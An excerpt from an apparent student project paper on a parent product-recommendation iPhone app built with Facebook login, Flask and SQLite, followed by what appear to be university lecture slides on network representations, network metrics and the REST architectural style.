categorized into the following: **Retailers** Retailers like Amazon, Target, Babies R Us and Toys R Us have a huge customer base and a very wide variety of products. Most of them also have a well-established e-commerce presence, where users can find and buy products, write reviews and also determine product availability in brick and mortar stores. Users cannot directly compare products or brands on these retailer’s websites and instead have to read user-submitted reviews or product ratings and then draw their own comparisons. These reviews and ratings are submitted by users but are limited to products sold by the retailers. Consumers cannot find out what their friends or other users like them are buying as these e-commerce websites do not leverage social networks or provide transparent and robust user profiles. Social networks Social networks are an efficient way for users to share information and media with acquaintances, and particularly with large groups of friends simultaneously. Facebook allows friends to share data and stay connected and is slowly also venturing into e-commerce through Facebook gifts and offers. Pinterest is much more focused on the sharing of photos and is commonly used for sharing ideas, recipes and crafts with others. Unlike Facebook, Pinterest users can choose to see postings made by their “followers” (eg: friends who are in their Pinterest network) or by the general public, but these websites do not have a product focus. If users do post product photos or reviews, they are not easily searchable and allow for no distinction between products that users own or have used and products that users simply feel like sharing with friends, often because of the product’s aesthetics rather than function or safety. Online Forums/Groups Forums and groups work particularly well for users belonging to specific neighborhoods or age groups. Groups like Berkeley Parents Network and San Francisco Mothers Club are quite popular among women and moms. Users like to share advice and experiences and these forums have become a default destination for getting a wide range of recommendations and tips. Again, these forums have no specific focus on products or e-commerce. The user experience is generally limited to lists of archived emails or comments, search is limited to basic keyword searches and the data (recommendation and information) is often outdated and not current. USER RESEARCH Our team conducted an early round of user research followed by a round of user research and usability testing after the first version of our app was completed. In the first round we performed very generalized user interviews of ten people, some with children, some without, and focused on the topics of product purchasing behavior, use of product reviews and ratings, use of mobile and web apps in product purchasing and discovery of new products. In our second round of user research and usability testing, we interviewed six women who either have young children, frequently shop for children’s products or are pregnant to discuss their product purchasing behavior and observe them using our app and our prototype. Three of these women had their children with them at the time of testing. Key Findings Key findings from our first round of user research encouraged us to narrow our focus from the general population to parents of smaller children. In general, people shopped using web and mobile devices in a myriad of ways across many channels and product categories. Building an app that appealed to anyone with a mobile device seemed overly broad and complicated. We contrasted our interviews of people without kids to our interviews of people with smaller children and found that parents, particularly moms, were an interesting customer segment for us as they spent much more time researching a broader range of products than people without kids. Moms relied heavily on reading reviews on Amazon before making purchases, often making those purchases through another retailer. Moms also relied heavily on in-person contact, email and phone conversations to solicit product advice from friends and they did this quite often. Our initial research did not uncover an app that moms used to discover personalized product recommendations or product recommendations from friends. Our second round of user research supported and expanded upon most of our initial findings. Once presented with our concept, moms were interested in the idea and expressed dissatisfaction with their current methods of finding product ratings and recommendations. All of the mothers we interviewed used Amazon to find product reviews and used Facebook, at least in a limited way, to stay in touch with friends, but none of the mothers had used or heard of any services that would allow them to access product recommendations from their friends. The mothers we interviewed all agreed that their friend’s reviews of products were more trustworthy to them than the reviews of parents that they didn’t know. One mom elaborated by saying: “My daughter is only two. We spend a lot of time in play-dates and with other moms and kids. Since she’s so little, I choose her friends and I choose them based on which moms I want to spend time with and who has similar parenting styles to me…I like this idea (toddle) since I choose most of my mom friends based on their values, so I trust their opinions more. I know their opinions are going to be close to mine.” Trust was a continuing theme in some of our user interviews as moms discussed privacy and security. While some parents were unconcerned with posting pictures of their kids to websites or writing reviews online using their real names, many parents worried about protecting their own privacy and that of their children. Moms most frequently had issues with posting recognizable photos of their children online where they could be accessed by strangers. Since early versions of our app only allow users to view postings made by their friends, moms felt that the app was private enough for them to feel comfortable posting both pictures and reviews. Interviewees were very divided, however, on other privacy issues. Some moms suggested that postings could be marked as private to friends or public, and that they’d like to be able to see the Toddle postings of users outside their friend network, while others felt that even their network wasn’t private enough. One expectant mother was concerned that within her network, she might not want coworkers, particularly male coworkers, to have the same access to her postings as her non-work friends. She pointed out that she would be more concerned with the privacy of postings for products she used personally, than for products that her child would use. On the other hand, other moms were concerned with the privacy of their kids information or photos but not at all concerned about the privacy of any postings for their own products. Lastly, we gained more insight into the importance of children’s products to parents and the amount of time moms spend researching product performance before making a purchase. Many moms felt that safety was a major reason that they researched children’s products more than they researched other types of products. Moms worried about the physical safety of their kids when products were being used, and the toxicity of products over the long term. Examples that were frequently cited were: the safety of cribs, both the mechanism of moving crib sides and bars, and the ingredients in the crib paint or finish; BPAs in plastic toys and bottles; lead paint being used in toys produced overseas; car seat and stroller safety and reliability; and food pesticides and additives. Overall, moms felt strongly that the products they purchased for their kids would determine their children’s long-term safety, development and happiness whereas products they purchased for themselves had a much shorter term impact of their own well-being. As a result, extensive research was justified. As one mom explained: “You raise your child only once. You want to have the best products that he or she can use in that limited time frame.” DESIGN AND ITERATION We adopted a lean approach to our design and development process, with iterative cycles of brainstorming; product prototyping and development; and user research and testing. After our early phases of user research, we distilled interviews into the key value propositions that an app like ours could offer customers. Once we understood the added value that our app could provide to users, we translated these values to possible features. We then distilled our broad feature list into a ranked list of features, ordered by both importance to users (based on our user research) and our ability to implement features from an engineering perspective. Our first release, or our minimum viable product (MVP), is the smallest feature set that still delivers a coherent, functional application to our users. Our MVP features include: - User login and authentication through Facebook Connect - Integration with Facebook SDK to allow users to connect with friends in their Facebook social network - User posting of product photos taken by either the phone camera or retrieved from the phone’s camera roll - User posting of data related to each product, including: product name, product rating, where product can be purchased, and comments - Search functionality that allows users to perform text search for postings by product name and age - Viewing of posts created by any friends in a users social network FUNCTIONAL REQUIREMENTS Social Integration A critical feature of our application is the ability of a user to connect with friends, and therefore friends’ recommendations, through our app. Since there are well-established existing social networks that could provide us with a set of friends for each user, we had no interest in building our own social network and forcing users to manually input all of their friends and contacts into our app. Our first round of user interviews indicated that a large percentage of moms have Facebook accounts that they use at least sporadically, so integrating with Facebook would allow us to access the networks of most potential customers. Since Facebook’s SDK also provides authentication system, we chose to use the Facebook SDK for our first version so users can log into our site using their Facebook credentials, giving us access to users’ existing social networks. This isn’t an ideal long-term solution for us, but was the easiest and most efficient method for us to allow users quick and safe access to our site and their connections. Some potential users have privacy concerns with allowing our app to access Facebook data and other users may not even have a Facebook account. In future versions of our product we’d like to allow users to access connections from their phone contacts or import contacts from email. Users without Facebook accounts or users with friends who don’t have accounts would then still be able to use our app with all of their acquaintances. We’d also like to allow for creating login credentials during a sign-up process, rather than using Facebook credentials, primarily for the same reasons. Data entry The primary source of data for the application would be user-generated content consisting of product pictures (or perhaps video) with additional metadata on each product. Pictures make the application look more attractive and also provide visual description of the product recommended. Since all iPhones and iPads come with built-in cameras, users of the app also have easy access to their existing photo streams and the ability to quickly take new photos. Users are also accustomed seeing pictures on other familiar applications like Facebook and Pinterest. Users will have ability take pictures of the products (they love or hate) from inside the app to post them directly into their stream. Additional required pieces of information like whether they love or hate the products, the age group for which the product is appropriate and the category to which the product belongs will be required and users will be able to enter this data by choosing from set values on buttons or in a dropdown list. This allows for users to quickly perform data entry. We will keep the amount of required data entry using a keyboard to a minimum, since typing is slow on the phone. More importantly, this will ensure a consistent quality of data posted and prevent us from having to deal with vocabulary variation when the data is later available to users for filtering or search. In future version of Toddle, our data entry module can be further extended to accept product data by scanning bar or QR codes, or by entering URIs to retrieve product photos and other information from e-commerce providers like Amazon or Etsy. Recommendation Given our target user group’s limited time but their high interest in good quality baby products, we think a love-hate binary model is suitable for them to focus on highly recommended or discouraged products. So far, our user testing in this area is less clear cut, but users we interviewed have indicated that they don’t appreciate “mediocre” or “2.5 star” ratings (on sites such as Amazon where ratings are out of five stars) and that they find these ratings confusing. We want to encourage users to post products to Toddle when they either highly endorse a product and hope their friends buy it, or when they highly dislike a product and want to warn others against purchasing it. By doing this, Toddle can then provide users with a select product list curated by their friends, rather than a more exhaustive list of whatever is on the market. This love-hate recommendation model allows Toddle to start offering more personalized recommendations to our users and differentiates us from sites like Amazon or Babies R Us. In the first version of our app, recommendation posting consists of users entering product name, a product image, age range for which the product is appropriate, product description or comments, and purchase place. Product name, photo image, age range and purchase place are mandatory information, while a description is optional. Users enter text for the product name and the place of purchase. Users can post one product image from their existing photos or by taking a picture instantly and love or hate is entered by selecting from radio buttons. Users can write why they like or dislike the product in a description field to give detailed information to their friends. Our service provides search functionality for users on the product name field or the age group. When a user performs a text search in their product stream, the text entered is queried against the product name field and the age group in our database. Any recommendation postings containing the search text in the product name or in the age group that have been posted by any of the users friends are then displayed. Future versions of our product will also allow users to filter postings by product category and by friend. The first version of our app allowed only the user postings a product to input a comment or description about the product as part of the posting process. In the second version of our service we have added functionality for users to comment on others postings. While reading a recommendation, a user can leave a comment asking for more information from the writer or to agree/disagree with the writer’s rating. These comments become a part of the posting and are visible to any user who can access the post. Technical Architecture The service architecture is based on a client-server model. It is comprised of client iPhone apps and a Web server which houses our database. Users interact with the Toddle app on their iPhone, and the app interacts with our remote Web server using Web service protocols (HTTP GET and POST). For user authentication, we use a Facebook authentication module. There are five main information flows among subsystems: 1. Data and photo request and post between iPhone app and Web server 2. Data fetch and upload between Web server and database 3. Photo fetch and upload between Web server and file system 4. User authentication between iPhone app (Facebook SDK) and Facebook server 5. User information request between iPhone app (Facebook SKD) and Facebook server iOS The Toddle iPhone mobile app is on the client side. It requests recommendation information from our Web server when a user either launches the app or logs in to the app. After receiving recommendation data, it represents this data in a table subview displayed on the users Stream view. For faster access of information, we apply a ‘caching’ mechanism that stores data locally in the internal file system of each users iPhone. When a user logs in or opens Toddle, the app retrieves information from the local file system. Toddle then tries to access the remote Web server to attain newly added information that is not in the internal file system. In addition to displaying a recommendation Stream view, Toddle enables users to post their product recommendations and to edit their profile page. Facebook SDK The iPhone app integrates with Facebook’s SDK, which connects to a Facebook server for user authentication and user data access. Users login to Toddle using their Facebook ID. After users login, our iPhone app can read user information such as name, username, and friend relationships from Facebook. Toddle stores this information in the remote database in our Web server. Whenever a user logs into Facebook, the server checks Facebook’s data against the data we’ve stored in our database to see if any of the social network information has changed. If the data has changed at all, we update the users information in our database. Web Servers Our Web server runs on Flask, which is a light Web server framework written in Python. The Web server interacts with Toddle using Web service protocols (HTTP GET and POST) and JSON format. Upon data request, the Web server fetches data from our Sqlite database, converts it into JSON format, and sends the data to the user’s iPhone app. For photo requests, the web server sends the image in the file system to the iPhone app. When the Web server receives post data from a Toddle user, it stores it in the Sqlite database. In the case of posted photos, however, the web server saves them in the file system. We explored several platforms for hosting our web server. Our first choice was Heroku, but we couldn’t move forward with Heroku due to incompatibilities with the sqlite database that we were using. Instead, we found and decided to use another platform called PythonAnywhere. PythonAnywhere is a Python development and hosting environment that displays in your web browser and runs on our servers. We migrated our server side files from the I School server where we were temporarily hosting, to PythonAnywhere with no compatibility issues. Database We are using a Sqlite database which is a default database system supported by Flask. The database stores data in tables on users, relationships, and recommendations. USABILITY TESTING After the first version of our app was built and deployed to phones, usability testing helped us to identify bugs, usability issues and feature requests. In the first version of Toddle, users had trouble properly posting ratings on products. The rating buttons were located at the bottom of the post page, were not very large, and defaulted to a rating of ‘Love.’ Users frequently missed rating the product so that the default ‘Love’ rating was applied. In version two, we created an additional view for the posting process and moved product name and rating to the first screen of the posting flow. Users take a photo and then are immediately prompted to enter the product name and rating. The rating buttons are larger and placed in the top half of the view. In follow-up usability testing, this redesign helped users post product ratings correctly. In our next release, we will change the rating buttons so that there is no default, making it impossible for users to skip rating a product or to accidentally use a default rating. Usability testing also helped us identify issues with our ratings icons, which are supposed to indicate to users whether the product a user posted was loved or hated. In version one, the rating icon (a heart or broken heart) was located next to product name, under the product photo. While users had an easy time seeing the Love and Hate icons, the placement under the photo caused them to think that the ratings icons were intended to be clickable, and many users thought that they could be used to indicate that a product was a ‘favorite’ or should be on their ‘wish list.’ In our second version of Toddle, we moved the ratings icons so that they cover the top left corner of the product photo. Placing them directly on the photo has helped parents to associate them with the product and users have been much less likely to assume that the icons are clickable. In future versions we will continue to experiment with the design and placement of our ratings system. FUTURE DEVELOPMENT Based on our user research and usability testing of the first and second versions of our app, we prototyped several additional features for the next version of the app that will work well with the basic app and product sharing model. We plan on continuing to develop Toddle and will work on implementing the following features for the next release of our product: **Ask Feature:** Users can ask their Toddle friends for recommendations about products that are not already posted. This feature not only helps users find products they want, but also works as a trigger for content generation. **Sell/Give away feature:** During our early user research we found that kids grew out of products rapidly and often quickly lost interest in a toy as they aged or used it frequently. Parents would either save the products for their next child or give them away to a close relative or friends with kids of a similar age. Parents sometimes also wanted to sell some of the expensive items they had purchased and there were few options for this. Parents had posted items on community forums or on craigslist, but products often didn’t sell or parents were uncomfortable selling items to strangers. Additionally, parents found it awkward to ask friends to pay for their products. We think a Sell/Give away feature will fit well within our current model of product sharing. Users get the best advertising for their products amongst all their friends, who are more likely to have similar tastes. Additionally it also takes away some of the awkwardness that comes with money exchange, by allowing users to post their asking price along with the posts. Lastly, allowing parents to sell products through our app provides us with numerous opportunities for future monetization, such as product listing fees, sponsored listings, or commissions on sales. **Comprehensive user profile:** During user research, moms requested more comprehensive user profiles for their friends. They were interested in being able to navigate to a friend’s profile and see all of that friend’s posts in one place, along with more information on that friend. They were also interested in more features for their own profiles, such as the ability to favorite products, add products to a wishlist and provide their friends with more information on their families. In version three of our app, we plan to provide user with the following: • A full featured user profile allows that users to view all their posts in one place • Users are able to bookmark products and view them at a later time on their profile page • Users can view toddle friends and visit friends’ profiles 1. User opens Toddle App 2. User passed through Facebook API: Are they logged in? - No - Facebook logs user in through API - Yes - API call to FB: Get FB User Detail - API returns user details; save new data on web server - API call to FB: Get Friends - Update the friends table on our web server - Toddle stream view in app
{"Source-Url": "https://www.ischool.berkeley.edu/sites/default/files/student_projects/toddle_masters_paper_0.pdf", "len_cl100k_base": 5481, "olmocr-version": "0.1.53", "pdf-total-pages": 13, "total-fallback-pages": 0, "total-input-tokens": 24441, "total-output-tokens": 5966, "length": "2e12", "weborganizer": {"__label__adult": 0.000850677490234375, "__label__art_design": 0.0016603469848632812, "__label__crime_law": 0.0006051063537597656, "__label__education_jobs": 0.00406646728515625, "__label__entertainment": 0.0002684593200683594, "__label__fashion_beauty": 0.0006527900695800781, "__label__finance_business": 0.004955291748046875, "__label__food_dining": 0.0014400482177734375, "__label__games": 0.0020465850830078125, "__label__hardware": 0.0015506744384765625, "__label__health": 0.0007376670837402344, "__label__history": 0.0004949569702148438, "__label__home_hobbies": 0.0013885498046875, "__label__industrial": 0.00031185150146484375, "__label__literature": 0.0007128715515136719, "__label__politics": 0.0003876686096191406, "__label__religion": 0.0004580020904541016, "__label__science_tech": 0.001987457275390625, "__label__social_life": 0.0026607513427734375, "__label__software": 0.037689208984375, "__label__software_dev": 0.93310546875, "__label__sports_fitness": 0.0004086494445800781, "__label__transportation": 0.0011138916015625, "__label__travel": 0.0004901885986328125}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 28802, 0.00127]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 28802, 0.01861]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 28802, 0.96329]], "google_gemma-3-12b-it_contains_pii": [[0, 72, false], [72, 3070, null], [3070, 5407, null], [5407, 8382, null], [8382, 11797, null], [11797, 14172, null], [14172, 17459, null], [17459, 20585, null], [20585, 21788, null], [21788, 24820, null], [24820, 28027, null], [28027, 28441, null], [28441, 28802, null]], "google_gemma-3-12b-it_is_public_document": [[0, 72, true], [72, 3070, null], [3070, 5407, null], [5407, 8382, null], [8382, 11797, null], [11797, 14172, null], [14172, 17459, null], [17459, 20585, null], [20585, 21788, null], [21788, 24820, null], [24820, 28027, null], [28027, 28441, null], [28441, 28802, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, false], [5000, 28802, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 28802, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 28802, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 28802, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 28802, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 28802, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 28802, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 28802, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 28802, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 28802, null]], "pdf_page_numbers": [[0, 72, 1], [72, 3070, 2], [3070, 5407, 3], [5407, 8382, 4], [8382, 11797, 5], [11797, 14172, 6], [14172, 17459, 7], [17459, 20585, 8], [20585, 21788, 9], [21788, 24820, 10], [24820, 28027, 11], [28027, 28441, 12], [28441, 28802, 13]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 28802, 0.0]]}
olmocr_science_pdfs
2024-12-07
2024-12-07
5778317260be69c3abd6df7e1a261ed525c5227e
707.000 Web Science and Web Technology „Web Technologies I“ Markus Strohmaier Univ. Ass. / Assistant Professor Knowledge Management Institute Graz University of Technology, Austria e-mail: markus.strohmaier@tugraz.at web: http://www.kmi.tugraz.at/staff/markus Overview Agenda Technical preliminaries for your first course work: • Network Preliminaries – One Mode and Two Mode Networks – Network Representation – Network Metrics • Software Architecture Preliminaries – REST – JSON • Release of Home Assignment 1.1 Network - A collection of individual or atomic entities - Referred to as nodes or vertices (the “dots” or “points”) - Collection of links or edges between vertices (the “lines”) - Links can represent any pairwise relationship - Links can be directed or undirected - Network: entire collection of nodes and links - For us, a network is an abstract object (list of pairs) and is separate from its visual layout - that is, we will be interested in properties that are invariant - structural properties - statistical properties of families of networks Social Networks Examples Why and How to Flash Your BIOS this url has been saved by 106 people. save this to your bookmarks » user notes Why and How to Flash Your BIOS rslw77 This article is going to focus on the basics and explain ways to flash the BIOS, precautions and how to recover in case of a bad flash. edwinnxk Why and How to Flash Your BIOS (Page 1 of 4 ) Flashing the BIOS is one of the most feared topics related to computers. Yes, people should be very cautious because it can be dangerous. This article is going to focus on the basics and explain ways to flash oblonski One mode / two mode networks (uni/bipartite graphs) One mode network: • A single type of nodes Two mode network: • Two types of nodes • Edges are only possible between different types of nodes How can we represent (social) networks? We will discuss three basic forms: - Adjacency lists - Adjacency matrices - Incident matrices Adjacency Matrix for one mode networks - Complete description of a graph - The matrix is symmetric for nondirectional graphs - A row and a column for each node - Of size $g \times g$ ($g$ rows and $g$ columns) Adjacency matrices for One-Mode Networks taken from http://courseweb.sp.cs.cmu.edu/~cs111/applications/ln/lecture18.html Adjacency matrix or sociomatrix Adjacency lists for One-Mode Networks taken from http://courseweb.sp.cs.cmu.edu/~cs111/applications/ln/lecture18.html Incidence Matrix for One-Mode Networks - (Another) complete description of a graph - Nodes indexing the rows, lines indexing the columns - g nodes and L lines, the matrix I is of size g x L - A "1" indicates that a node $n_i$ is incident with line $l_j$ - Each column has exactly two 1's in it Table 4.3. Example of an incidence matrix: “lives near” relation for six children <table> <thead> <tr> <th></th> <th>$l_1$</th> <th>$l_2$</th> <th>$l_3$</th> <th>$l_4$</th> <th>$l_5$</th> <th>$l_6$</th> </tr> </thead> <tbody> <tr> <td>$n_1$</td> <td>1</td> <td>1</td> <td>0</td> <td>0</td> <td>0</td> <td>0</td> </tr> <tr> <td>$n_2$</td> <td>0</td> <td>0</td> <td>1</td> <td>0</td> <td>0</td> <td>0</td> </tr> <tr> <td>$n_3$</td> <td>0</td> <td>0</td> <td>1</td> <td>0</td> <td>0</td> <td>0</td> </tr> <tr> <td>$n_4$</td> <td>0</td> <td>0</td> <td>0</td> <td>1</td> <td>1</td> <td>0</td> </tr> <tr> <td>$n_5$</td> <td>1</td> <td>0</td> <td>0</td> <td>1</td> <td>0</td> <td>1</td> </tr> <tr> <td>$n_6$</td> <td>0</td> <td>1</td> <td>0</td> <td>0</td> <td>1</td> <td>1</td> </tr> </tbody> </table> [Wasserman Faust 1994] Fig. 3.2. The six actors and the three sets of directed lines — a multivariate directed graph Adjacency lists vs. matrices taken from http://courseweb.sp.cs.cmu.edu/~cs111/applications/ln/lecture18.html Lists Vs. Matrices (I) If the graph is sparse (there aren't many edges), then the matrix will take up a lot of space indicating all of the pairs of vertices which don't have an edge between them, but the adjacency list does not have that problem, because it only keeps track of what edges are actually in the graph. On the other hand, if there are a lot of edges in the graph, or if it is fully connected, then the list has a lot of overhead because of all of the references. Lists Vs. Matrices (II) If we need to look specifically at a given edge, we can go right to that spot in the matrix, but in the list we might have to traverse a long linked list before we hit the end and find out that it is not in the graph. If we need to look at all of a vertex's neighbors, if you use a matrix you will have to scan through all of the vertices which aren't neighbors as well, whereas in the list you can just scan the linked-list of neighbors. Adjacency lists vs. matrices taken from http://courseweb.sp.cs.cmu.edu/~cs111/applications/ln/lecture18.html Lists Vs. Matrices (III) If, in a directed graph, we ask the question, "Which vertices have edges leading to vertex X?", the answer is **straight-forward to find in an adjacency matrix** - we just walk down column X and report all of the edges that are present. But, life isn't so easy with the adjacency list - we actually have to perform a brute-force search. ⇒ So which representation you use depends on what you are trying to represent and what you plan on doing with the graph Illustration! Adjacency matrices for Two-Mode Networks - Complete description of a graph - A row and a column for each node - Of size $m \times n$ (m rows and n columns) ``` <table> <thead> <tr> <th></th> <th>Allison</th> <th>Drew</th> <th>Eliot</th> <th>Keith</th> <th>Ross</th> <th>Sarah</th> </tr> </thead> <tbody> <tr> <td>Party 1</td> <td>1</td> <td>0</td> <td>0</td> <td>0</td> <td>1</td> <td>1</td> </tr> <tr> <td>Party 2</td> <td>0</td> <td>1</td> <td>1</td> <td>0</td> <td>1</td> <td>1</td> </tr> <tr> <td>Party 3</td> <td>1</td> <td>0</td> <td>1</td> <td>1</td> <td>1</td> <td>0</td> </tr> </tbody> </table> ``` Network Metrics for One-Mode Networks - If the distance between all pairs is finite, we say the network is connected (a single component); else it has multiple components - **Degree of vertex** $v$: number of edges connected to $v$ - **Average degree of vertex** $v$: avg. number of edges connected to a vertex Two Mode Networks - Rates of Participation [Wasserman Faust 1994] • The number of events with which each actor is affiliated. • These quantities are either given by – the row totals of affiliation matrix A or – the entries on the main diagonal of the one-mode socio-matrice $X^N$ • Thus, the number of events with which actor $i$ is affiliated is equal to the degree of the node representing the actor in the bipartite graph. • Also interesting: **Average rate of participation** Example: <table> <thead> <tr> <th></th> <th>Party 1</th> <th>Party 2</th> <th>Party 3</th> </tr> </thead> <tbody> <tr> <td>Allison</td> <td>1</td> <td>0</td> <td>1</td> </tr> <tr> <td>Drew</td> <td>0</td> <td>1</td> <td>0</td> </tr> <tr> <td>Eliot</td> <td>0</td> <td>1</td> <td>1</td> </tr> <tr> <td>Keith</td> <td>0</td> <td>0</td> <td>1</td> </tr> <tr> <td>Ross</td> <td>1</td> <td>1</td> <td>1</td> </tr> <tr> <td>Sarah</td> <td>1</td> <td>1</td> <td>0</td> </tr> </tbody> </table> Examples: What does the rate of participation relate to in the Netflix / Amazon bipartite graph of customer/movies or customer/products? Two Mode Networks - Size of Events [Wasserman Faust 1994] • The number of actors participating in each event. • The size of each event is given by either – the column totals of the affiliation matrix $A$ or – the entries on the main diagonal of the one-mode sociomatrix $X^M$. • Thus, the size of each event is equal to the degree of the node representing the event in the bipartite graph. • Also interesting: **Average size of events** – Sometimes useful to study average size of clubs or organizations • Size of events might be constrained: – E.g. board of company directors are made up of a fixed number of people Example: <table> <thead> <tr> <th></th> <th>Party 1</th> <th>Party 2</th> <th>Party 3</th> </tr> </thead> <tbody> <tr> <td>Allison</td> <td>1</td> <td>0</td> <td>1</td> </tr> <tr> <td>Drew</td> <td>0</td> <td>1</td> <td>0</td> </tr> <tr> <td>Eliot</td> <td>0</td> <td>1</td> <td>1</td> </tr> <tr> <td>Keith</td> <td>0</td> <td>0</td> <td>1</td> </tr> <tr> <td>Ross</td> <td>1</td> <td>1</td> <td>1</td> </tr> <tr> <td>Sarah</td> <td>1</td> <td>1</td> <td>0</td> </tr> </tbody> </table> Examples: What does the rate of participation relate to in the Netflix / Amazon bipartite graph of customer/movies or customer/products? Network Acquisition on the Web • How can we acquire network information from the web? Example: • RESTful Interfaces REST Roy Fielding, Dissertation 2000 • Roy Fielding - Chief Scientist, Day Software - Co-founder and member, The Apache Software Foundation - Dissertation on Architectural Styles and the Design of Network-based Software Architectures at the Information and Computer Science, UC Irvine In his dissertation, he "introduce[s] the Representational State Transfer (REST) architectural style and describe[s] how REST has been used to guide the design and development of the architecture for the modern Web" Ressources: • http://roy.gbiv.com/talks/200709_fielding_rest.pdf Has played a role in authoring the Internet standards for the Hypertext Transfer Protocol (HTTP) and Uniform Resource Identifiers (URI) The early web Figure 5-5. Early WWW Architecture Diagram The Problem (circa 1994) Early architecture was based on solid principles - URLs, separation of concerns, simplicity - lacked architectural description and rationale Protocols assumed a direct server connection - no awareness of caching, proxies, or spiders - many independent extensions Public awareness of the Web was just beginning - exponential growth threatened the Internet - commercialization meant new requirements and new stakeholders A modern Web architecture was clearly needed - but how do we avoid breaking the Web in the process? Software Architectures A software architecture is an abstraction of the runtime elements of a software system during some phase of its operation. A system may be composed of many levels of abstraction and many phases of operation, each with its own software architecture. - A software architecture is defined by a configuration of architectural elements—components, connectors, and data—constrained in their relationships in order to achieve a desired set of architectural properties. - A configuration is the structure of architectural relationships among components, connectors, and data during a period of system run-time. Web Architecture One abstraction level above the implementation Components - User agents, Intermediaries, Servers - Browsers, Spiders, Proxies, Gateways, Origin Servers Connectors - HTTP: a standard transfer protocol to prefer over many Data - URI: one identifier standard for all resources - HTML, XML, RDF, ...: common representation formats to describe and bind resources REST Roy Fielding, RailsConf Europe, September 2007 How beautiful it is to do nothing, and then REST afterward. [Spanish Proverb] Style = nil Starting from a condition of no constraints... No architectural constraints on the roles and features of components, connectors and data, and the allowed relationships among them. REST Roy Fielding, RailsConf Europe, September 2007 Style += Client/Server Apply separation of concerns: Client-Server Representation Data improves UI portability simplifies server enables multiple organizational domains Separation of concerns, scalability REST client-stateless-server (CSS) style Roy Fielding, RailsConf Europe, September 2007 ... and to lie sometimes on the grass ... Style += Stateless Constrain interaction to be stateless... degrades efficiency Repetitive data simplifies server improves scalability improves reliability Visibility – Single request contains all information to understand the full nature of the request Easily free resources Easy recovery each request from client to server must contain all of the information necessary to understand the request REST client-cache-stateless-server style Roy Fielding, RailsConf Europe, September 2007 Style += Caching Add optional non-shared caching - the potential to partially or completely eliminate some interactions - reduces average latency - improves efficiency - improves scalability Cachable vs. non-cachable content degraded reliability REST Roy Fielding, RailsConf Europe, September 2007 Style += Uniform Interface Apply generality: uniform interface constraint - improves visibility - independent evolvability - decouples implementation - degrades efficiency information is transferred in a standardized form REST Roy Fielding, RailsConf Europe, September 2007 Style += Layered System Apply info hiding: layered system constraints - Simplifies clients - Improves scalability - Load balancing - Adds latency - Shared caching - Legacy encapsulation Complexity reduction: each component cannot "see" beyond the immediate layer ... or watching the clouds float across the sky, ... REST Style by downloading and executing code in the form of applets or scripts simplifies clients improves extensibility reduces visibility Finally, allow code-on-demand (applets/js) ... is by no means a waste of time. [Sir John Lubbock] Roy Fielding, RailsConf Europe, September 2007 REST Roy Fielding, RailsConf Europe, September 2007 Sometimes the most urgent and vital thing you can possibly do is take a complete REST. [Ashleigh Brilliant] REST on a slide - RR - replicated - Cache on-demand - CS - Client server - stateless - intermediate processing - reliable - cacheable - scalable - LS - Layered System - mobile - shared - multi-org. - VM - Virtual Mach. - extensible - code on demand - reusable - U - simple visible - COD - Code on demand - LC$$SS - Layered client server - extensible - code on demand - reusable - LCODC$$SS - Layered client server - extensible - code on demand - reusable - REST - layered - programmable - uniform interface Client serverCache Why bother? Roy Fielding, Dissertation 2000 - “creating an **architectural model** for how the Web should work” - “Using the new architectural style as a guide, we can **compare proposed extensions and modifications** to the Web architecture against the constraints within the style. **Conflicts** indicate that the proposal would violate one or more of the design principles behind the Web. - For **severe conflicts**, such as a change in the interaction style, the same functionality would **either be replaced** with a design more conducive to the Web's style, or the proposer would be told to implement the functionality as a **separate architecture** running in parallel to the Web.” REMINDER: Web Architecture Roy Fielding, RailsConf Europe, September 2007 Web Architecture One abstraction level above the implementation Components - User agents, Intermediaries, Servers - Browsers, Spiders, Proxies, Gateways, Origin Servers Connectors - HTTP: a standard transfer protocol to prefer over many Data - URI: one identifier standard for all resources - HTML, XML, RDF, ...: common representation formats to describe and bind resources Representations Representations Roy Fielding, Dissertation 2000 • “REST components perform actions on a resource by using a representation to capture the current or intended state of that resource and transferring that representation between components.” • “less precise names for a representation include: document, file, and HTTP message entity, instance, or variant. “ • Depending on the message control data, a given representation may indicate the current state of the requested resource, the desired state for the requested resource, or the value of some other resource […]. # REST ## Table 17-1. HTTP Methods for REST <table> <thead> <tr> <th>Method</th> <th>CRUD Operation</th> <th>Description</th> </tr> </thead> <tbody> <tr> <td>GET</td> <td>Retrieve</td> <td>Retrieves the representation of a resource.</td> </tr> <tr> <td>HEAD</td> <td></td> <td>Retrieves metadata for the representation and resource.</td> </tr> <tr> <td>POST</td> <td>Create</td> <td>In the strict sense, POST creates a resource. In the real world, however, POST is typically used to create, update, and even delete a resource. It is normal to use REST services that support only GET and POST.</td> </tr> <tr> <td>PUT</td> <td>Update</td> <td>Updates a resource. More often than not, you will not see this method used in the real world but instead will see POST used to perform the actions.</td> </tr> <tr> <td>DELETE</td> <td>Delete</td> <td>Deletes a resource. Just like PUT, in the real world this is rarely used, and instead POST is used in its place.</td> </tr> </tbody> </table> Theory vs. Practice Chapter "Representational State Transfer (REST)" in "Pro PHP XML and Web Services", R. Richards 633–672 (2006) and - How has this theory influenced current practice? REST applied to HTTP - The REST service is expressed as a URL and is accessed with basic HTTP requests. - The HTTP verb is important: a GET is a read operation, POST is a creation, and PUT make updates to the service. - The return payload is usually XML or JSON. http://dev2dev.bea.com/pub/a/2007/05/google-mashups.html 